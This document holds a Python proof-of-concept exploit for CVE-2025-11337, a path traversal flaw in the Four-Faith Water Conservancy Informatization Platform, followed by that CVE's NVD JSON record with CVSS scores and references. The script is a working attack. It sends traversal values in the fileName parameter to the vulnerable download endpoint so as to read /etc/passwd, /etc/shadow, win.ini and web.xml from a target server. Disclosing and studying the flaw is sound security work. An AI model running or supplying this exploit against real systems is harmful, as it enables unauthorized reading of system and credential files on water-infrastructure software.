CVE-2025-11337

# CVE-2025-11337 PoC - Four-Faith Water Conservancy Informatization Platform Path Traversal # Vulnerability: Path Traversal via fileName parameter # Affected endpoint: /aloneReport/index.do/../../aloneReport/download.do;othersusrlogout.do import requests TARGET_URL = "http://target.com" VULNERABLE_ENDPOINT = "/aloneReport/index.do/../../aloneReport/download.do;othersusrlogout.do" def exploit_path_traversal(target_url, file_name): """ Exploit path traversal vulnerability by manipulating the fileName parameter. :param target_url: Base URL of the target server :param file_name: File path to read (e.g., ../../../etc/passwd) :return: Response content from the server """ # Construct the full URL url = target_url.rstrip('/') + VULNERABLE_ENDPOINT # Set the fileName parameter with path traversal payload params = { "fileName": file_name } try: # Send the malicious request response = requests.get(url, params=params, timeout=10) if response.status_code == 200: print(f"[+] Successfully accessed file: {file_name}") print(f"[+] Response content:\n{response.text}") return response.text else: print(f"[-] Request failed with status code: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Error occurred: {e}") return None if __name__ == "__main__": # Example: Try to read /etc/passwd on Linux or win.ini on Windows target_files = [ "../../../etc/passwd", "..\\..\\..\\..\\windows\\win.ini", "../../../../etc/shadow", "../WEB-INF/web.xml" ] for target_file in target_files: print(f"\n[*] Attempting to access: {target_file}") result = exploit_path_traversal(TARGET_URL, target_file) if result: break

{"cve": {"id": "CVE-2025-11337", "sourceIdentifier": "[email protected]", "published": "2025-10-06T14:15:42.270", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in Four-Faith Water Conservancy Informatization Platform up to 2.2. This affects an unknown part of the file /aloneReport/index.do/../../aloneReport/download.do;othersusrlogout.do. Performing manipulation of the argument fileName results in path traversal. It is possible to initiate the attack remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/jiangfeng13/CVE/issues/1", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.327220", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.327220", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.664615", "source": "[email protected]"}]}}